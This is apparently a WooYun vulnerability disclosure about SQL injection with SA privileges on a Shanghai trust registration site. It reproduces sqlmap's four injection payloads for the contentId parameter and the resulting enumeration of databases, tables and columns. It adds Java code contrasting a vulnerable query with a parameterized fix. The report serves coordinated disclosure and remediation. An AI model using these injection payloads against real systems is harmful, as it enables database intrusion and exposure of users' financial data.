Vulnerability summary

Defect ID: wooyun-2015-0142854

Title: Shanghai Trust Registration Center SQL injection (SA privileges), leaking a large amount of sensitive information

Vendor: strc.org.cn

Author: 路人甲

Submitted: 2015-09-24 22:19

Fixed: 2015-11-09 17:40

Published: 2015-11-09 17:40

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 11

Status: Handed over to a third-party partner (CNCERT, the National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2015-09-24: Details sent to the vendor, awaiting vendor handling
2015-09-25: CNCERT was unable to reach the relevant organization for now; details disclosed only to the reporting agency
2015-10-05: Details disclosed to core white hats and experts in the relevant field
2015-10-15: Details disclosed to regular white hats
2015-10-25: Details disclosed to intern white hats
2015-11-09: Details disclosed to the public

Brief description:

SQL injection at the Shanghai Trust Registration Center (SA privileges), leaking a large amount of sensitive information...

Detailed description:

Testing shows the injection runs with SA privileges, which is a very high level of privilege and makes getting a shell possible.
A large amount of product information and user information is exposed.
Link: http://**.**.**.**/commix/product/article_info.jsp?contentId=405

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: contentId
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: contentId=405' AND 8458=8458 AND 'HYBC'='HYBC
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: contentId=405' AND 1386=CONVERT(INT,(CHAR(58)+CHAR(107)+CHAR(104)+CHAR(99)+CHAR(58)+(SELECT (CASE WHEN (1386=1386) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(119)+CHAR(118)+CHAR(100)+CHAR(58))) AND 'PRSL'='PRSL
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: contentId=405'; WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: contentId=405' WAITFOR DELAY '0:0:5'--
---
[20:01:50] [INFO] the back-end DBMS is Microsoft SQL Server
web application technology: JSP
back-end DBMS: Microsoft SQL Server 2005
[20:01:50] [INFO] fetching database names
[20:01:50] [INFO] the SQL query used returns 5 entries
[20:01:50] [INFO] retrieved: EFMSS
[20:01:50] [INFO] retrieved: master
[20:01:50] [INFO] retrieved: model
[20:01:50] [INFO] retrieved: msdb
[20:01:50] [INFO] retrieved: tempdb
available databases [5]:
[*] EFMSS
[*] master
[*] model
[*] msdb
[*] tempdb
[20:02:23] [INFO] retrieved: sa
database management system users [1]:
[*] sa
current database: 'EFMSS'
current user: 'sa'
Database: EFMSS
[158 tables]
+--------------------+
| ACCOUNT_INFO |
| ACCOUNT_QUEUE |
| ASSET_INFO |
| ASSURE_CONTRACT |
| ASSURE_DETAIL |
| ASSURE_INFO |
| BAIL_INFO |
| BILL_INFO |
| BI_DIMENSIONS |
| BI_OBEJCT |
| BI_TEST_DATA |
| CHECK_INTEGRITY |
| CLICK_RECORD |
| CONFIG_CATALOG |
| CONFIG_CATEGORY |
| CONFIG_DATA |
| CONFIG_ELEMENT |
| CONFIG_MENU |
| CONFIG_RECORD |
| CONFIG_REGION |
| CONTENT_INFO |
| CONTENT_TYPE |
| CONTRACT_ADDITION |
| CONTRACT_CREDIT |
| CONTRACT_DUEBILL |
| CONTRACT_HISTORY |
| CONTRACT_PUTOUT |
| CONTRACT_REPAYPLAN |
| COOPERATE_FINANCE |
| CUSTOMER_IMPORTANT |
| CUST_CREDIT |
| CUST_CREDITSHOW |
| CUST_RIGHT |
| D99_CMD |
| D99_Tmp |
| EXCELIMP_CATALOG |
| EXCELIMP_FIELD |
| EXCEL_DATATEMP |
| FINANCE_REPORT |
| FLOW_CATALOG |
| FLOW_DRIVE |
| FLOW_DRIVEDRAW |
| FLOW_NODE |
| FLOW_NODEDRAW |
| FLOW_OBJECT |
| FLOW_OPINION |
| FLOW_STATE |
| FLOW_TASK |
| FLOW_VIEW |
| FORMPRINT_CATALOG |
| FORMPRINT_DETAIL |
| INTEREST_RATEINFO |
| INTERFACE_CATALOG |
| INTERFACE_FIELD |
| INVOICE_INFO |
| ITEM_APPROVE |
| ITEM_CHANGE |
| ITEM_CHECK |
| ITEM_CLASSIFY |
| ITEM_CONTRACT |
| ITEM_DULLPAY |
| ITEM_EXTEND |
| ITEM_FLOWPROCESS |
| ITEM_FUNCHISTORY |
| ITEM_FUNCTION |
| ITEM_INFO |
| ITEM_INFO_TEST |
| ITEM_PLAN |
| ITEM_PLANHISTORY |
| ITEM_PROJECT |
| ITEM_REPAY |
| ITEM_RISK |
| LEVEL_APPDATA |
| LEVEL_APPRECORD |
| LEVEL_DRIVE |
| LEVEL_ITEMINDEX |
| LEVEL_TYPE |
| LINKMAN_INFO |
| LINK_MAN |
| MESSAGE_INFO |
| MODIFY_LOGINFO |
| MYORG_INFO |
| OBJECT_RELATION |
| PIC_INFO |
| PLAN_WEEK |
| POOL_ASSET |
| POOL_ASSETCHANGE |
| POOL_ASSETTREAT |
| POOL_INFO |
| POOL_RATECHANGE |
| POOL_REPAYPLAN |
| POOL_STANDARD |
| POST_ACCBALANCE |
| POST_ACCOUNT |
| POST_BALANCE |
| POST_LIST |
| POST_SUBBALANCE |
| POST_SUBJECT |
| POST_TRADE |
| POST_WARRANT |
| PRE_ITEM |
| PRODUCT_ACCOUNT |
| PRODUCT_AGNCY |
| PRODUCT_BENEFIT |
| PRODUCT_BOOK |
| PRODUCT_CASH |
| PRODUCT_CHANGE |
| PRODUCT_DATETIME |
| PRODUCT_DETAIL |
| PRODUCT_EVENT |
| PRODUCT_GROUP |
| PRODUCT_HISTORY |
| PRODUCT_HOLDER |
| PRODUCT_INFO |
| PRODUCT_ISSUE |
| PRODUCT_LEVEL |
| PRODUCT_MUL |
| PRODUCT_PAYMENT |
| PRODUCT_RECEIVEPAY |
| PRODUCT_REPAY |
| PRODUCT_SALE |
| PRODUCT_TRADE |
| PRODUCT_TRUST |
| PRODUCT_TYPE |
| PRODUCT_VALUE |
| PROJECT_INFO |
| TACCTBOOK |
| TBASETAXRATE |
| TCASHTYPE |
| TCUSTFINANCEINFO |
| TCUSTFINANCEITEM |
| TCUSTHOLDERS |
| TCUST_CERT |
| TDEPARTMENT |
| TDICTPARAM |
| TEFGMSCONTROL |
| TENTCUSTINFO |
| TENTCWZBINFO |
| TERRORINFO |
| TLOGLIST |
| TOPBOOK |
| TOPERATOR |
| TOPROLE |
| TRADE_INFO |
| TRECORDATTACHMENTS |
| TREPORTINFO |
| TROLE |
| TROLERIGHT |
| TSYSCONTROL |
| TSYSTEMINFO |
| TUSERINFO |
| TUSETIMES |
| T_REPORT_DATA |
| T_REPORT_DATA_T |
| T_REPORT_FIELD |
| WORKINFO_CONFIG |
| WORK_LOG |
| sysdiagrams |
+--------------------+


[Screenshots 2.png to 5.png not included]


Proof of vulnerability:

Database: EFMSS
+------------------------+---------+
| Table | Entries |
+------------------------+---------+
| dbo.TLOGLIST | 206845 |
| dbo.PRODUCT_INFO | 9071 |
| dbo.CONFIG_REGION | 6193 |
| dbo.INTERFACE_FIELD | 3122 |
| dbo.FORMPRINT_DETAIL | 447 |
| dbo.CONTENT_INFO | 423 |
| dbo.TERRORINFO | 367 |
| dbo.TENTCUSTINFO | 185 |
| dbo.INTERFACE_CATALOG | 170 |
| dbo.TOPBOOK | 161 |
| dbo.TOPERATOR | 161 |
| dbo.EXCELIMP_FIELD | 143 |
| dbo.TCUSTFINANCEITEM | 132 |
| dbo.CONFIG_CATEGORY | 111 |
| dbo.T_REPORT_FIELD | 106 |
| dbo.TREPORTINFO | 104 |
| dbo.CONTENT_TYPE | 93 |
| dbo.CONFIG_MENU | 92 |
| dbo.FLOW_NODE | 61 |
| dbo.LEVEL_ITEMINDEX | 55 |
| dbo.FLOW_DRIVE | 50 |
| dbo.POST_SUBJECT | 47 |
| dbo.CUST_RIGHT | 45 |
| dbo.TCASHTYPE | 45 |
| dbo.PRODUCT_TRADE | 41 |
| dbo.CHECK_INTEGRITY | 26 |
| dbo.LEVEL_DRIVE | 26 |
| dbo.FLOW_OBJECT | 25 |
| dbo.FORMPRINT_CATALOG | 24 |
| dbo.FLOW_VIEW | 16 |
| dbo.PLAN_WEEK | 15 |
| dbo.PRODUCT_TYPE | 15 |
| dbo.TOPROLE | 13 |
| dbo.FLOW_CATALOG | 12 |
| dbo.D99_Tmp | 8 |
| dbo.PIC_INFO | 8 |
| dbo.TDEPARTMENT | 8 |
| dbo.TROLE | 7 |
+------------------------+---------+

Database: EFMSS
Table: PRODUCT_INFO
[58 columns]
+--------------------+----------+
| Column | Type |
+--------------------+----------+
| ASSURE_DESC | nvarchar |
| BENEFIT_TYPE | nvarchar |
| BENEFIT_YIELD | numeric |
| CLICK_DAYNUM | int |
| CLICK_MONTHNUM | int |
| CLICK_NUM | int |
| CLICK_QUARTERNNUM | int |
| CLICK_TENNUM | int |
| CLICK_WEEKNUM | int |
| CLICK_YEARNUM | int |
| CURRENCY_TYPE | nvarchar |
| CURRENCY_TYPE_NAME | nvarchar |
| END_DATE | nvarchar |
| END_YIELD | numeric |
| FINISH_DATE | nvarchar |
| FINISH_TYPE | numeric |
| IF_COMPLETE | nvarchar |
| INCOME_TYPE | nvarchar |
| INDUSTRY_TYPE | nvarchar |
| INPUT_DEPT | nvarchar |
| INPUT_TIME | datetime |
| INPUT_USER | nvarchar |
| INVEST_MANAGE | nvarchar |
| INVEST_SUM | numeric |
| INVEST_TYPE | nvarchar |
| IS_ATTACHMENT | int |
| ISSUE_ORGID | nvarchar |
| ISSUE_ORGNAME | nvarchar |
| ISSUE_ORGSNAME | nvarchar |
| ISSUE_TERM | int |
| MANAGE_BANK | nvarchar |
| MANAGE_RATE | nvarchar |
| MANAGE_TYPE | nvarchar |
| OPEN_TYPE | nvarchar |
| PIGEONHOLE_DATE | nvarchar |
| POINT_DESC | nvarchar |
| PRODUCT_CODE | nvarchar |
| PRODUCT_ID | int |
| PRODUCT_NAME | nvarchar |
| PRODUCT_PHASE | nvarchar |
| PRODUCT_STATE | nvarchar |
| PRODUCT_SUM | numeric |
| PRODUCT_TYPE | nvarchar |
| PRODUCT_TYPE_NAME | nvarchar |
| PURCHASE_RATE | nvarchar |
| REDEEM_RATE | nvarchar |
| REMARK | nvarchar |
| SELL_ADDR | nvarchar |
| SELL_ENDDATE | nvarchar |
| SELL_OBJECT | nvarchar |
| SELL_STARTDATE | nvarchar |
| SIMPLE_NAME | nvarchar |
| START_DATE | nvarchar |
| START_YIELD | numeric |
| STRUCTURE_DESC | nvarchar |
| TERM_TYPE | nvarchar |
| TRUST_MANAGER | nvarchar |
| USE_DESC | nvarchar |
+--------------------+----------+


[Screenshots 5.png to 7.png not included]


Remediation:

Filter the input...
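As an added illustration (not code from the original report or from the affected site), here is the concatenation pattern that produces this class of injection next to a parameterized version, written in Java as a JSP back end would use it. The DAO class, method names and the column names are assumptions; CONTENT_INFO is a table name listed in the report.

```java
import java.sql.Connection;
import java.sql.PreparedStatement;
import java.sql.ResultSet;
import java.sql.SQLException;

// Hypothetical data-access class for article_info.jsp; the site's real code is not on the page.
public class ArticleInfoDao {

    // Assumed vulnerable pattern: the raw request parameter is pasted into the SQL text.
    // A value such as  405' AND 8458=8458 AND 'HYBC'='HYBC  becomes part of the statement,
    // and a stacked-query value ('; WAITFOR DELAY ...) lets the client run statements of its own.
    public static String vulnerableQuery(String contentId) {
        return "SELECT * FROM CONTENT_INFO WHERE CONTENT_ID = '" + contentId + "'";
    }

    // Hardened step 1: enforce the parameter's type. contentId is an integer id in the URL,
    // so anything that is not a short run of digits is rejected before any SQL is built.
    public static int parseContentId(String raw) {
        if (raw == null || !raw.matches("\\d{1,9}")) {
            throw new IllegalArgumentException("contentId must be a positive integer");
        }
        return Integer.parseInt(raw);
    }

    // Hardened step 2: bind the value as a typed parameter. The driver sends it separately
    // from the statement text, so it can never be interpreted as SQL.
    // The Connection passed in should belong to a low-privileged application login with
    // SELECT on the content tables only, not to the sa account the report found in use.
    public static ResultSet findContent(Connection conn, String rawContentId) throws SQLException {
        int contentId = parseContentId(rawContentId);
        // Column names TITLE and BODY are assumed for the example.
        PreparedStatement ps = conn.prepareStatement(
            "SELECT TITLE, BODY FROM CONTENT_INFO WHERE CONTENT_ID = ?");
        ps.setInt(1, contentId);
        return ps.executeQuery();
    }
}
```

With both steps in place, each of the four sqlmap techniques listed above (boolean-based, error-based, stacked queries, time-based) fails at the type check, and the parameter binding covers any path the check is later relaxed for.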

Copyright notice: please credit the source when reposting: 路人甲@乌云


Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 10

Confirmed: 2015-09-25 17:39

Vendor reply:


CNVD confirmed and reproduced the described situation, and has notified the website administrator by email through the site's public contact channel; they will provide a solution subsequently.

Latest status:

None yet